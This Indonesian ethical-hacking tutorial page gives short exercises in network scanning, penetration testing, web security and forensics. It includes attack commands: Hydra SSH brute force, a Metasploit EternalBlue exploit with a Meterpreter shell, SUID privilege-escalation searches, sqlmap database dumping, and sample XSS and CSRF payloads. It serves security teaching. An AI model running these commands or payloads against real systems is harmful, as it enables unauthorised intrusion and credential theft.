🔐 Tutorial Hacking
Belajar ethical hacking dan keamanan siber.
🔒
Network Security
Keamanan jaringan dan teknik penetration testing.
Latihan 1: Scan jaringan dengan Nmap.
nmap -sV -sC 192.168.1.0/24
# Output: daftar host, port terbuka, dan serviceLatihan 2: Deteksi kerentanan dengan Nessus.
1. Install Nessus
2. Buat scan policy baru
3. Masukkan IP target
4. Jalankan scan dan analisis hasilLatihan 3: Analisis packet dengan Wireshark.
1. Buka Wireshark
2. Pilih interface jaringan
3. Capture packet
4. Analisis protocol dan payloadLatihan 4: Brute force SSH dengan Hydra.
hydra -l admin -P wordlist.txt ssh://192.168.1.1Latihan 5: Deteksi intrusi dengan Snort.
snort -c /etc/snort/snort.conf -i eth0 -A console🎯
Penetration Testing
Metodologi penetration testing dan tools.
Latihan 1: Reconnaissance dengan theHarvester.
theHarvester -d example.com -b googleLatihan 2: Scan port dan service dengan Nmap.
nmap -sS -sV -O -A 192.168.1.1Latihan 3: Exploit dengan Metasploit.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
exploitLatihan 4: Privilege escalation di Linux.
sudo -l
find / -perm -4000 2>/dev/null
# Cari SUID binary yang bisa dieksploitasiLatihan 5: Post-exploitation dengan Meterpreter.
meterpreter > sysinfo
meterpreter > getuid
meterpreter > shell🌐
Web Security
Keamanan web application: SQL injection, XSS, CSRF.
Latihan 1: SQL Injection dengan sqlmap.
sqlmap -u "http://example.com/page?id=1" --dbsLatihan 2: XSS (Cross-Site Scripting) testing.
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>Latihan 3: CSRF (Cross-Site Request Forgery) testing.
<form action="http://example.com/change-password" method="POST">
<input type="hidden" name="password" value="hacked">
</form>Latihan 4: Directory scanning dengan Gobuster.
gobuster dir -u http://example.com -w wordlist.txtLatihan 5: SSL/TLS scanning dengan SSLyze.
sslyze --regular example.com🔍
Forensics
Digital forensics dan analisis malware.
Latihan 1: Analisis file dengan ExifTool.
exifTool suspicious.jpgLatihan 2: Analisis network capture dengan Wireshark.
1. Buka file .pcap di Wireshark
2. Follow TCP Stream
3. Analisis protocol dan payloadLatihan 3: Analisis malware dengan VirusTotal.
1. Upload file ke virustotal.com
2. Analisis hasil scan
3. Cek behavior dan signatureLatihan 4: File recovery dengan PhotoRec.
photorec /dev/sda1Latihan 5: Memory analysis dengan Volatility.
volatility -f memory.dmp imageinfo
volatility -f memory.dmp pslist